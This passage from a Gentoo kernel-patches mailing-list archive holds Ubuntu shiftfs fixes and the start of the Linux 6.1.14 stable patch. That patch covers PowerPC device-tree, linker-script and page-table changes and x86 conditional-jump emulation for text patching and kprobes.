+Date: Tue, 18 Oct 2022 17:09:12 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support kernel 6.1
+Cc: mpagano@gentoo.org
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 5 ++---
+ 1 file changed, 2 insertions(+), 3 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index a5338dc6290c..34f080ae0fec 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -747,19 +747,18 @@ static int shiftfs_fiemap(struct inode *inode,
+ }
+ 
+ static int shiftfs_tmpfile(struct user_namespace *ns,
+-			   struct inode *dir, struct dentry *dentry,
++			   struct inode *dir, struct file *file,
+ 			   umode_t mode)
+ {
+ 	int err;
+ 	const struct cred *oldcred;
+-	struct dentry *lowerd = dentry->d_fsdata;
+ 	struct inode *loweri = dir->i_private;
+ 
+ 	if (!loweri->i_op->tmpfile)
+ 		return -EOPNOTSUPP;
+ 
+ 	oldcred = shiftfs_override_creds(dir->i_sb);
+-	err = loweri->i_op->tmpfile(&init_user_ns, loweri, lowerd, mode);
++	err = loweri->i_op->tmpfile(&init_user_ns, loweri, file, mode);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+-- 
+2.39.2
+
+From 63014ad24c3b175e503324461ded0a6a8ed12ab6 Mon Sep 17 00:00:00 2001
+From: Alexander Mikhalitsyn <aleksandr.mikhalitsyn@canonical.com>
+Date: Tue, 31 Jan 2023 17:11:48 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix -EOVERFLOW inside the container
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1990849
+
+We haven't supported idmapped layers with shiftfs and moreover, that makes
+no sense. Once lower fs support idmapped mounts when shiftfs is not needed.
+
+Starting from linux-image-5.15.0-48-generic users started seeing EOVERFLOW
+errors from the userspace side on a trivial fs operations inside the containers.
+
+This is caused by patches ("fs: tweak fsuidgid_has_mapping()"),
+("fs: support mapped mounts of mapped filesystems"). These patches extends
+and enables idmapped mounts support in Ubuntu kernel, but the problem is
+that shiftfs was not properly ported.
+
+See also:
+("namei: prepare for idmapped mounts")
+https://lore.kernel.org/all/20210121131959.646623-15-christian.brauner@ubuntu.com/
+("overlayfs: do not mount on top of idmapped mounts")
+https://lore.kernel.org/all/20210121131959.646623-29-christian.brauner@ubuntu.com/
+as a reference.
+
+This patch should be appied on top of kinetic/master-next and based on the
+changes by Andrea Righi 4c934edc66 ("UBUNTU: SAUCE: shiftfs: always rely on init_user_ns")
+
+This commit together with 4c934edc66 ("UBUNTU: SAUCE: shiftfs: always rely on init_user_ns")
+have to be ported to the jammy tree too.
+
+Fixes: d347e71d2c0 ("UBUNTU: [SAUCE] shiftfs: support kernel 5.15")
+Reported-by: Thomas Parrott <thomas.parrott@canonical.com>
+Signed-off-by: Alexander Mikhalitsyn <aleksandr.mikhalitsyn@canonical.com>
+Acked-by: Tim Gardner <tim.gardner@canonical.com>
+Acked-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 16 +++++++++++++---
+ 1 file changed, 13 insertions(+), 3 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index cda74b614505..2664e1fb65d3 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -632,10 +632,10 @@ static int shiftfs_rename(struct user_namespace *ns,
+ 	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
+ 		     *loweri_dir_new = lowerd_dir_new->d_inode;
+ 	struct renamedata rd = {
+-		.old_mnt_userns	= ns,
++		.old_mnt_userns	= &init_user_ns,
+ 		.old_dir	= loweri_dir_old,
+ 		.old_dentry	= lowerd_old,
+-		.new_mnt_userns	= ns,
++		.new_mnt_userns	= &init_user_ns,
+ 		.new_dir	= loweri_dir_new,
+ 		.new_dentry	= lowerd_new,
+ 	};
+@@ -971,7 +971,7 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
+ 		return -EOPNOTSUPP;
+ 	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
+ 		return value ? -EACCES : 0;
+-	if (!inode_owner_or_capable(ns, inode))
++	if (!inode_owner_or_capable(&init_user_ns, inode))
+ 		return -EPERM;
+ 
+ 	if (value) {
+@@ -2015,6 +2015,16 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		goto out_put_path;
+ 	}
+ 
++	/*
++	 * It makes no sense to handle idmapped layers from shiftfs.
++	 * And we didn't support it properly anyway.
++	 */
++	if (is_idmapped_mnt(path.mnt)) {
++		err = -EINVAL;
++		pr_err("idmapped layers are currently not supported\n");
++		goto out_put_path;
++	}
++
+ 	sb->s_flags |= SB_POSIXACL;
+ 
+ 	if (sbinfo->mark) {
+-- 
+2.39.2
+


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-25 11:02 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-02-25 11:02 UTC (permalink / raw
  To: gentoo-commits

commit:     7ddeb328a51014d4b4d5cdf6a4f691d982aa06ad
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Sat Feb 25 10:58:21 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Sat Feb 25 10:58:21 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=7ddeb328

Linux patch 6.1.14

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |    4 +
 1013_linux-6.1.14.patch | 2813 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2817 insertions(+)

diff --git a/0000_README b/0000_README
index dee78b52..4604bf4f 100644
--- a/0000_README
+++ b/0000_README
@@ -95,6 +95,10 @@ Patch:  1012_linux-6.1.13.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.13
 
+Patch:  1013_linux-6.1.14.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.14
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1013_linux-6.1.14.patch b/1013_linux-6.1.14.patch
new file mode 100644
index 00000000..ed2de6e9
--- /dev/null
+++ b/1013_linux-6.1.14.patch
@@ -0,0 +1,2813 @@
+diff --git a/Documentation/admin-guide/perf/hisi-pcie-pmu.rst b/Documentation/admin-guide/perf/hisi-pcie-pmu.rst
+index 294ebbdb22af8..bbe66480ff851 100644
+--- a/Documentation/admin-guide/perf/hisi-pcie-pmu.rst
++++ b/Documentation/admin-guide/perf/hisi-pcie-pmu.rst
+@@ -15,10 +15,10 @@ HiSilicon PCIe PMU driver
+ The PCIe PMU driver registers a perf PMU with the name of its sicl-id and PCIe
+ Core id.::
+ 
+-  /sys/bus/event_source/hisi_pcie<sicl>_<core>
++  /sys/bus/event_source/hisi_pcie<sicl>_core<core>
+ 
+ PMU driver provides description of available events and filter options in sysfs,
+-see /sys/bus/event_source/devices/hisi_pcie<sicl>_<core>.
++see /sys/bus/event_source/devices/hisi_pcie<sicl>_core<core>.
+ 
+ The "format" directory describes all formats of the config (events) and config1
+ (filter options) fields of the perf_event_attr structure. The "events" directory
+@@ -33,13 +33,13 @@ monitored by PMU.
+ Example usage of perf::
+ 
+   $# perf list
+-  hisi_pcie0_0/rx_mwr_latency/ [kernel PMU event]
+-  hisi_pcie0_0/rx_mwr_cnt/ [kernel PMU event]
++  hisi_pcie0_core0/rx_mwr_latency/ [kernel PMU event]
++  hisi_pcie0_core0/rx_mwr_cnt/ [kernel PMU event]
+   ------------------------------------------
+ 
+-  $# perf stat -e hisi_pcie0_0/rx_mwr_latency/
+-  $# perf stat -e hisi_pcie0_0/rx_mwr_cnt/
+-  $# perf stat -g -e hisi_pcie0_0/rx_mwr_latency/ -e hisi_pcie0_0/rx_mwr_cnt/
++  $# perf stat -e hisi_pcie0_core0/rx_mwr_latency/
++  $# perf stat -e hisi_pcie0_core0/rx_mwr_cnt/
++  $# perf stat -g -e hisi_pcie0_core0/rx_mwr_latency/ -e hisi_pcie0_core0/rx_mwr_cnt/
+ 
+ The current driver does not support sampling. So "perf record" is unsupported.
+ Also attach to a task is unsupported for PCIe PMU.
+@@ -64,7 +64,7 @@ bit8 is set, port=0x100; if these two Root Ports are both monitored, port=0x101.
+ 
+ Example usage of perf::
+ 
+-  $# perf stat -e hisi_pcie0_0/rx_mwr_latency,port=0x1/ sleep 5
++  $# perf stat -e hisi_pcie0_core0/rx_mwr_latency,port=0x1/ sleep 5
+ 
+ -bdf
+ 
+@@ -76,7 +76,7 @@ For example, "bdf=0x3900" means BDF of target Endpoint is 0000:39:00.0.
+ 
+ Example usage of perf::
+ 
+-  $# perf stat -e hisi_pcie0_0/rx_mrd_flux,bdf=0x3900/ sleep 5
++  $# perf stat -e hisi_pcie0_core0/rx_mrd_flux,bdf=0x3900/ sleep 5
+ 
+ 2. Trigger filter
+ Event statistics start when the first time TLP length is greater/smaller
+@@ -90,7 +90,7 @@ means start when TLP length < condition.
+ 
+ Example usage of perf::
+ 
+-  $# perf stat -e hisi_pcie0_0/rx_mrd_flux,trig_len=0x4,trig_mode=1/ sleep 5
++  $# perf stat -e hisi_pcie0_core0/rx_mrd_flux,trig_len=0x4,trig_mode=1/ sleep 5
+ 
+ 3. Threshold filter
+ Counter counts when TLP length within the specified range. You can set the
+@@ -103,4 +103,4 @@ when TLP length < threshold.
+ 
+ Example usage of perf::
+ 
+-  $# perf stat -e hisi_pcie0_0/rx_mrd_flux,thr_len=0x4,thr_mode=1/ sleep 5
++  $# perf stat -e hisi_pcie0_core0/rx_mrd_flux,thr_len=0x4,thr_mode=1/ sleep 5
+diff --git a/MAINTAINERS b/MAINTAINERS
+index d4822ae39e396..350d7e3ba94f9 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -3444,7 +3444,7 @@ F:	drivers/net/ieee802154/atusb.h
+ AUDIT SUBSYSTEM
+ M:	Paul Moore <paul@paul-moore.com>
+ M:	Eric Paris <eparis@redhat.com>
+-L:	linux-audit@redhat.com (moderated for non-subscribers)
++L:	audit@vger.kernel.org
+ S:	Supported
+ W:	https://github.com/linux-audit
+ T:	git git://git.kernel.org/pub/scm/linux/kernel/git/pcmoore/audit.git
+diff --git a/Makefile b/Makefile
+index e51356b982f90..3e82a32243626 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 13
++SUBLEVEL = 14
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/powerpc/boot/dts/fsl/qoriq-fman3-0-10g-2.dtsi b/arch/powerpc/boot/dts/fsl/qoriq-fman3-0-10g-2.dtsi
+new file mode 100644
+index 0000000000000..437dab3fc0176
+--- /dev/null
++++ b/arch/powerpc/boot/dts/fsl/qoriq-fman3-0-10g-2.dtsi
+@@ -0,0 +1,44 @@
++// SPDX-License-Identifier: BSD-3-Clause OR GPL-2.0-or-later
++/*
++ * QorIQ FMan v3 10g port #2 device tree stub [ controller @ offset 0x400000 ]
++ *
++ * Copyright 2022 Sean Anderson <sean.anderson@seco.com>
++ * Copyright 2012 - 2015 Freescale Semiconductor Inc.
++ */
++
++fman@400000 {
++	fman0_rx_0x08: port@88000 {
++		cell-index = <0x8>;
++		compatible = "fsl,fman-v3-port-rx";
++		reg = <0x88000 0x1000>;
++		fsl,fman-10g-port;
++	};
++
++	fman0_tx_0x28: port@a8000 {
++		cell-index = <0x28>;
++		compatible = "fsl,fman-v3-port-tx";
++		reg = <0xa8000 0x1000>;
++		fsl,fman-10g-port;
++	};
++
++	ethernet@e0000 {
++		cell-index = <0>;
++		compatible = "fsl,fman-memac";
++		reg = <0xe0000 0x1000>;
++		fsl,fman-ports = <&fman0_rx_0x08 &fman0_tx_0x28>;
++		ptp-timer = <&ptp_timer0>;
++		pcsphy-handle = <&pcsphy0>;
++	};
++
++	mdio@e1000 {
++		#address-cells = <1>;
++		#size-cells = <0>;
++		compatible = "fsl,fman-memac-mdio", "fsl,fman-xmdio";
++		reg = <0xe1000 0x1000>;
++		fsl,erratum-a011043; /* must ignore read errors */
++
++		pcsphy0: ethernet-phy@0 {
++			reg = <0x0>;
++		};
++	};
++};
+diff --git a/arch/powerpc/boot/dts/fsl/qoriq-fman3-0-10g-3.dtsi b/arch/powerpc/boot/dts/fsl/qoriq-fman3-0-10g-3.dtsi
+new file mode 100644
+index 0000000000000..ad116b17850a8
+--- /dev/null
++++ b/arch/powerpc/boot/dts/fsl/qoriq-fman3-0-10g-3.dtsi
+@@ -0,0 +1,44 @@
++// SPDX-License-Identifier: BSD-3-Clause OR GPL-2.0-or-later
++/*
++ * QorIQ FMan v3 10g port #3 device tree stub [ controller @ offset 0x400000 ]
++ *
++ * Copyright 2022 Sean Anderson <sean.anderson@seco.com>
++ * Copyright 2012 - 2015 Freescale Semiconductor Inc.
++ */
++
++fman@400000 {
++	fman0_rx_0x09: port@89000 {
++		cell-index = <0x9>;
++		compatible = "fsl,fman-v3-port-rx";
++		reg = <0x89000 0x1000>;
++		fsl,fman-10g-port;
++	};
++
++	fman0_tx_0x29: port@a9000 {
++		cell-index = <0x29>;
++		compatible = "fsl,fman-v3-port-tx";
++		reg = <0xa9000 0x1000>;
++		fsl,fman-10g-port;
++	};
++
++	ethernet@e2000 {
++		cell-index = <1>;
++		compatible = "fsl,fman-memac";
++		reg = <0xe2000 0x1000>;
++		fsl,fman-ports = <&fman0_rx_0x09 &fman0_tx_0x29>;
++		ptp-timer = <&ptp_timer0>;
++		pcsphy-handle = <&pcsphy1>;
++	};
++
++	mdio@e3000 {
++		#address-cells = <1>;
++		#size-cells = <0>;
++		compatible = "fsl,fman-memac-mdio", "fsl,fman-xmdio";
++		reg = <0xe3000 0x1000>;
++		fsl,erratum-a011043; /* must ignore read errors */
++
++		pcsphy1: ethernet-phy@0 {
++			reg = <0x0>;
++		};
++	};
++};
+diff --git a/arch/powerpc/boot/dts/fsl/t2081si-post.dtsi b/arch/powerpc/boot/dts/fsl/t2081si-post.dtsi
+index ecbb447920bc6..27714dc2f04a5 100644
+--- a/arch/powerpc/boot/dts/fsl/t2081si-post.dtsi
++++ b/arch/powerpc/boot/dts/fsl/t2081si-post.dtsi
+@@ -609,8 +609,8 @@
+ /include/ "qoriq-bman1.dtsi"
+ 
+ /include/ "qoriq-fman3-0.dtsi"
+-/include/ "qoriq-fman3-0-1g-0.dtsi"
+-/include/ "qoriq-fman3-0-1g-1.dtsi"
++/include/ "qoriq-fman3-0-10g-2.dtsi"
++/include/ "qoriq-fman3-0-10g-3.dtsi"
+ /include/ "qoriq-fman3-0-1g-2.dtsi"
+ /include/ "qoriq-fman3-0-1g-3.dtsi"
+ /include/ "qoriq-fman3-0-1g-4.dtsi"
+@@ -659,3 +659,19 @@
+ 		interrupts = <16 2 1 9>;
+ 	};
+ };
++
++&fman0_rx_0x08 {
++	/delete-property/ fsl,fman-10g-port;
++};
++
++&fman0_tx_0x28 {
++	/delete-property/ fsl,fman-10g-port;
++};
++
++&fman0_rx_0x09 {
++	/delete-property/ fsl,fman-10g-port;
++};
++
++&fman0_tx_0x29 {
++	/delete-property/ fsl,fman-10g-port;
++};
+diff --git a/arch/powerpc/kernel/vmlinux.lds.S b/arch/powerpc/kernel/vmlinux.lds.S
+index 8c3862b4c259d..a4c6efadc90c1 100644
+--- a/arch/powerpc/kernel/vmlinux.lds.S
++++ b/arch/powerpc/kernel/vmlinux.lds.S
+@@ -8,6 +8,7 @@
+ #define BSS_FIRST_SECTIONS *(.bss.prominit)
+ #define EMITS_PT_NOTE
+ #define RO_EXCEPTION_TABLE_ALIGN	0
++#define RUNTIME_DISCARD_EXIT
+ 
+ #define SOFT_MASK_TABLE(align)						\
+ 	. = ALIGN(align);						\
+@@ -410,9 +411,12 @@ SECTIONS
+ 	DISCARDS
+ 	/DISCARD/ : {
+ 		*(*.EMB.apuinfo)
+-		*(.glink .iplt .plt .rela* .comment)
++		*(.glink .iplt .plt .comment)
+ 		*(.gnu.version*)
+ 		*(.gnu.attributes)
+ 		*(.eh_frame)
++#ifndef CONFIG_RELOCATABLE
++		*(.rela*)
++#endif
+ 	}
+ }
+diff --git a/arch/powerpc/mm/book3s64/radix_pgtable.c b/arch/powerpc/mm/book3s64/radix_pgtable.c
+index 5a2384ed17279..26245aaf12b8b 100644
+--- a/arch/powerpc/mm/book3s64/radix_pgtable.c
++++ b/arch/powerpc/mm/book3s64/radix_pgtable.c
+@@ -234,6 +234,14 @@ void radix__mark_rodata_ro(void)
+ 	end = (unsigned long)__end_rodata;
+ 
+ 	radix__change_memory_range(start, end, _PAGE_WRITE);
++
++	for (start = PAGE_OFFSET; start < (unsigned long)_stext; start += PAGE_SIZE) {
++		end = start + PAGE_SIZE;
++		if (overlaps_interrupt_vector_text(start, end))
++			radix__change_memory_range(start, end, _PAGE_WRITE);
++		else
++			break;
++	}
+ }
+ 
+ void radix__mark_initmem_nx(void)
+@@ -268,6 +276,11 @@ static unsigned long next_boundary(unsigned long addr, unsigned long end)
+ 
+ 	// Relocatable kernel running at non-zero real address
+ 	if (stext_phys != 0) {
++		// The end of interrupts code at zero is a rodata boundary
++		unsigned long end_intr = __pa_symbol(__end_interrupts) - stext_phys;
++		if (addr < end_intr)
++			return end_intr;
++
+ 		// Start of relocated kernel text is a rodata boundary
+ 		if (addr < stext_phys)
+ 			return stext_phys;
+diff --git a/arch/s390/kernel/vmlinux.lds.S b/arch/s390/kernel/vmlinux.lds.S
+index f81d96710595a..cbf9c1b0beda4 100644
+--- a/arch/s390/kernel/vmlinux.lds.S
++++ b/arch/s390/kernel/vmlinux.lds.S
+@@ -17,6 +17,8 @@
+ /* Handle ro_after_init data on our own. */
+ #define RO_AFTER_INIT_DATA
+ 
++#define RUNTIME_DISCARD_EXIT
++
+ #define EMITS_PT_NOTE
+ 
+ #include <asm-generic/vmlinux.lds.h>
+diff --git a/arch/sh/kernel/vmlinux.lds.S b/arch/sh/kernel/vmlinux.lds.S
+index 3161b9ccd2a57..b6276a3521d73 100644
+--- a/arch/sh/kernel/vmlinux.lds.S
++++ b/arch/sh/kernel/vmlinux.lds.S
+@@ -4,6 +4,7 @@
+  * Written by Niibe Yutaka and Paul Mundt
+  */
+ OUTPUT_ARCH(sh)
++#define RUNTIME_DISCARD_EXIT
+ #include <asm/thread_info.h>
+ #include <asm/cache.h>
+ #include <asm/vmlinux.lds.h>
+diff --git a/arch/x86/include/asm/text-patching.h b/arch/x86/include/asm/text-patching.h
+index 1cc15528ce29b..85b85a275a434 100644
+--- a/arch/x86/include/asm/text-patching.h
++++ b/arch/x86/include/asm/text-patching.h
+@@ -183,6 +183,37 @@ void int3_emulate_ret(struct pt_regs *regs)
+ 	unsigned long ip = int3_emulate_pop(regs);
+ 	int3_emulate_jmp(regs, ip);
+ }
++
++static __always_inline
++void int3_emulate_jcc(struct pt_regs *regs, u8 cc, unsigned long ip, unsigned long disp)
++{
++	static const unsigned long jcc_mask[6] = {
++		[0] = X86_EFLAGS_OF,
++		[1] = X86_EFLAGS_CF,
++		[2] = X86_EFLAGS_ZF,
++		[3] = X86_EFLAGS_CF | X86_EFLAGS_ZF,
++		[4] = X86_EFLAGS_SF,
++		[5] = X86_EFLAGS_PF,
++	};
++
++	bool invert = cc & 1;
++	bool match;
++
++	if (cc < 0xc) {
++		match = regs->flags & jcc_mask[cc >> 1];
++	} else {
++		match = ((regs->flags & X86_EFLAGS_SF) >> X86_EFLAGS_SF_BIT) ^
++			((regs->flags & X86_EFLAGS_OF) >> X86_EFLAGS_OF_BIT);
++		if (cc >= 0xe)
++			match = match || (regs->flags & X86_EFLAGS_ZF);
++	}
++
++	if ((match && !invert) || (!match && invert))
++		ip += disp;
++
++	int3_emulate_jmp(regs, ip);
++}
++
+ #endif /* !CONFIG_UML_X86 */
+ 
+ #endif /* _ASM_X86_TEXT_PATCHING_H */
+diff --git a/arch/x86/kernel/alternative.c b/arch/x86/kernel/alternative.c
+index 5cadcea035e04..d1d92897ed6be 100644
+--- a/arch/x86/kernel/alternative.c
++++ b/arch/x86/kernel/alternative.c
+@@ -339,6 +339,12 @@ next:
+ 	}
+ }
+ 
++static inline bool is_jcc32(struct insn *insn)
++{
++	/* Jcc.d32 second opcode byte is in the range: 0x80-0x8f */
++	return insn->opcode.bytes[0] == 0x0f && (insn->opcode.bytes[1] & 0xf0) == 0x80;
++}
++
+ #if defined(CONFIG_RETPOLINE) && defined(CONFIG_OBJTOOL)
+ 
+ /*
+@@ -427,8 +433,7 @@ static int patch_retpoline(void *addr, struct insn *insn, u8 *bytes)
+ 	 *   [ NOP ]
+ 	 * 1:
+ 	 */
+-	/* Jcc.d32 second opcode byte is in the range: 0x80-0x8f */
+-	if (op == 0x0f && (insn->opcode.bytes[1] & 0xf0) == 0x80) {
++	if (is_jcc32(insn)) {
+ 		cc = insn->opcode.bytes[1] & 0xf;
+ 		cc ^= 1; /* invert condition */
+ 
+@@ -1311,6 +1316,11 @@ void text_poke_sync(void)
+ 	on_each_cpu(do_sync_core, NULL, 1);
+ }
+ 
++/*
++ * NOTE: crazy scheme to allow patching Jcc.d32 but not increase the size of
++ * this thing. When len == 6 everything is prefixed with 0x0f and we map
++ * opcode to Jcc.d8, using len to distinguish.
++ */
+ struct text_poke_loc {
+ 	/* addr := _stext + rel_addr */
+ 	s32 rel_addr;
+@@ -1432,6 +1442,10 @@ noinstr int poke_int3_handler(struct pt_regs *regs)
+ 		int3_emulate_jmp(regs, (long)ip + tp->disp);
+ 		break;
+ 
++	case 0x70 ... 0x7f: /* Jcc */
++		int3_emulate_jcc(regs, tp->opcode & 0xf, (long)ip, tp->disp);
++		break;
++
+ 	default:
+ 		BUG();
+ 	}
+@@ -1505,16 +1519,26 @@ static void text_poke_bp_batch(struct text_poke_loc *tp, unsigned int nr_entries
+ 	 * Second step: update all but the first byte of the patched range.
+ 	 */
+ 	for (do_sync = 0, i = 0; i < nr_entries; i++) {
+-		u8 old[POKE_MAX_OPCODE_SIZE] = { tp[i].old, };
++		u8 old[POKE_MAX_OPCODE_SIZE+1] = { tp[i].old, };
++		u8 _new[POKE_MAX_OPCODE_SIZE+1];
++		const u8 *new = tp[i].text;
+ 		int len = tp[i].len;
+ 
+ 		if (len - INT3_INSN_SIZE > 0) {
+ 			memcpy(old + INT3_INSN_SIZE,
+ 			       text_poke_addr(&tp[i]) + INT3_INSN_SIZE,
+ 			       len - INT3_INSN_SIZE);
++
++			if (len == 6) {
++				_new[0] = 0x0f;
++				memcpy(_new + 1, new, 5);
++				new = _new;
++			}
++
+ 			text_poke(text_poke_addr(&tp[i]) + INT3_INSN_SIZE,
+-				  (const char *)tp[i].text + INT3_INSN_SIZE,
++				  new + INT3_INSN_SIZE,
+ 				  len - INT3_INSN_SIZE);
++
+ 			do_sync++;
+ 		}
+ 
+@@ -1542,8 +1566,7 @@ static void text_poke_bp_batch(struct text_poke_loc *tp, unsigned int nr_entries
+ 		 * The old instruction is recorded so that the event can be
+ 		 * processed forwards or backwards.
+ 		 */
+-		perf_event_text_poke(text_poke_addr(&tp[i]), old, len,
+-				     tp[i].text, len);
++		perf_event_text_poke(text_poke_addr(&tp[i]), old, len, new, len);
+ 	}
+ 
+ 	if (do_sync) {
+@@ -1560,10 +1583,15 @@ static void text_poke_bp_batch(struct text_poke_loc *tp, unsigned int nr_entries
+ 	 * replacing opcode.
+ 	 */
+ 	for (do_sync = 0, i = 0; i < nr_entries; i++) {
+-		if (tp[i].text[0] == INT3_INSN_OPCODE)
++		u8 byte = tp[i].text[0];
++
++		if (tp[i].len == 6)
++			byte = 0x0f;
++
++		if (byte == INT3_INSN_OPCODE)
+ 			continue;
+ 
+-		text_poke(text_poke_addr(&tp[i]), tp[i].text, INT3_INSN_SIZE);
++		text_poke(text_poke_addr(&tp[i]), &byte, INT3_INSN_SIZE);
+ 		do_sync++;
+ 	}
+ 
+@@ -1581,9 +1609,11 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 			       const void *opcode, size_t len, const void *emulate)
+ {
+ 	struct insn insn;
+-	int ret, i;
++	int ret, i = 0;
+ 
+-	memcpy((void *)tp->text, opcode, len);
++	if (len == 6)
++		i = 1;
++	memcpy((void *)tp->text, opcode+i, len-i);
+ 	if (!emulate)
+ 		emulate = opcode;
+ 
+@@ -1594,6 +1624,13 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 	tp->len = len;
+ 	tp->opcode = insn.opcode.bytes[0];
+ 
++	if (is_jcc32(&insn)) {
++		/*
++		 * Map Jcc.d32 onto Jcc.d8 and use len to distinguish.
++		 */
++		tp->opcode = insn.opcode.bytes[1] - 0x10;
++	}
++
+ 	switch (tp->opcode) {
+ 	case RET_INSN_OPCODE:
+ 	case JMP32_INSN_OPCODE:
+@@ -1610,7 +1647,6 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 		BUG_ON(len != insn.length);
+ 	};
+ 
+-
+ 	switch (tp->opcode) {
+ 	case INT3_INSN_OPCODE:
+ 	case RET_INSN_OPCODE:
+@@ -1619,6 +1655,7 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 	case CALL_INSN_OPCODE:
+ 	case JMP32_INSN_OPCODE:
+ 	case JMP8_INSN_OPCODE:
++	case 0x70 ... 0x7f: /* Jcc */
+ 		tp->disp = insn.immediate.value;
+ 		break;
+ 
+diff --git a/arch/x86/kernel/kprobes/core.c b/arch/x86/kernel/kprobes/core.c
+index 5be7f23099e1f..ea155f0cf545c 100644
+--- a/arch/x86/kernel/kprobes/core.c
++++ b/arch/x86/kernel/kprobes/core.c
+@@ -471,50 +471,26 @@ static void kprobe_emulate_call(struct kprobe *p, struct pt_regs *regs)
+ }
+ NOKPROBE_SYMBOL(kprobe_emulate_call);
+ 
+-static nokprobe_inline
+-void __kprobe_emulate_jmp(struct kprobe *p, struct pt_regs *regs, bool cond)
++static void kprobe_emulate_jmp(struct kprobe *p, struct pt_regs *regs)
+ {
+ 	unsigned long ip = regs->ip - INT3_INSN_SIZE + p->ainsn.size;
+ 
+-	if (cond)
+-		ip += p->ainsn.rel32;
++	ip += p->ainsn.rel32;
+ 	int3_emulate_jmp(regs, ip);
+ }
+-
+-static void kprobe_emulate_jmp(struct kprobe *p, struct pt_regs *regs)
+-{
+-	__kprobe_emulate_jmp(p, regs, true);
+-}
+ NOKPROBE_SYMBOL(kprobe_emulate_jmp);
+ 
+-static const unsigned long jcc_mask[6] = {
+-	[0] = X86_EFLAGS_OF,
+-	[1] = X86_EFLAGS_CF,
+-	[2] = X86_EFLAGS_ZF,
+-	[3] = X86_EFLAGS_CF | X86_EFLAGS_ZF,
+-	[4] = X86_EFLAGS_SF,
+-	[5] = X86_EFLAGS_PF,
+-};
+-
+ static void kprobe_emulate_jcc(struct kprobe *p, struct pt_regs *regs)
+ {
+-	bool invert = p->ainsn.jcc.type & 1;
+-	bool match;
++	unsigned long ip = regs->ip - INT3_INSN_SIZE + p->ainsn.size;
+ 
+-	if (p->ainsn.jcc.type < 0xc) {
+-		match = regs->flags & jcc_mask[p->ainsn.jcc.type >> 1];
+-	} else {
+-		match = ((regs->flags & X86_EFLAGS_SF) >> X86_EFLAGS_SF_BIT) ^
+-			((regs->flags & X86_EFLAGS_OF) >> X86_EFLAGS_OF_BIT);
+-		if (p->ainsn.jcc.type >= 0xe)
+-			match = match || (regs->flags & X86_EFLAGS_ZF);
+-	}
+-	__kprobe_emulate_jmp(p, regs, (match && !invert) || (!match && invert));
++	int3_emulate_jcc(regs, p->ainsn.jcc.type, ip, p->ainsn.rel32);
+ }
+ NOKPROBE_SYMBOL(kprobe_emulate_jcc);
+ 
+ static void kprobe_emulate_loop(struct kprobe *p, struct pt_regs *regs)
+ {
++	unsigned long ip = regs->ip - INT3_INSN_SIZE + p->ainsn.size;
+ 	bool match;
+ 
+ 	if (p->ainsn.loop.type != 3) {	/* LOOP* */
+@@ -542,7 +518,9 @@ static void kprobe_emulate_loop(struct kprobe *p, struct pt_regs *regs)
+ 	else if (p->ainsn.loop.type == 1)	/* LOOPE */
+ 		match = match && (regs->flags & X86_EFLAGS_ZF);
+ 
+-	__kprobe_emulate_jmp(p, regs, match);
++	if (match)
++		ip += p->ainsn.rel32;
++	int3_emulate_jmp(regs, ip);
+ }
+ NOKPROBE_SYMBOL(kprobe_emulate_loop);
+ 
+diff --git a/arch/x86/kernel/static_call.c b/arch/x86/kernel/static_call.c
+index aaaba85d6d7ff..a9b54b795ebff 100644
+--- a/arch/x86/kernel/static_call.c
++++ b/arch/x86/kernel/static_call.c
+@@ -9,6 +9,7 @@ enum insn_type {
+ 	NOP = 1,  /* site cond-call */
+ 	JMP = 2,  /* tramp / site tail-call */
+ 	RET = 3,  /* tramp / site cond-tail-call */
++	JCC = 4,
+ };
+ 
+ /*
+@@ -25,12 +26,39 @@ static const u8 xor5rax[] = { 0x2e, 0x2e, 0x2e, 0x31, 0xc0 };
+ 
+ static const u8 retinsn[] = { RET_INSN_OPCODE, 0xcc, 0xcc, 0xcc, 0xcc };
+ 
++static u8 __is_Jcc(u8 *insn) /* Jcc.d32 */
++{
++	u8 ret = 0;
++
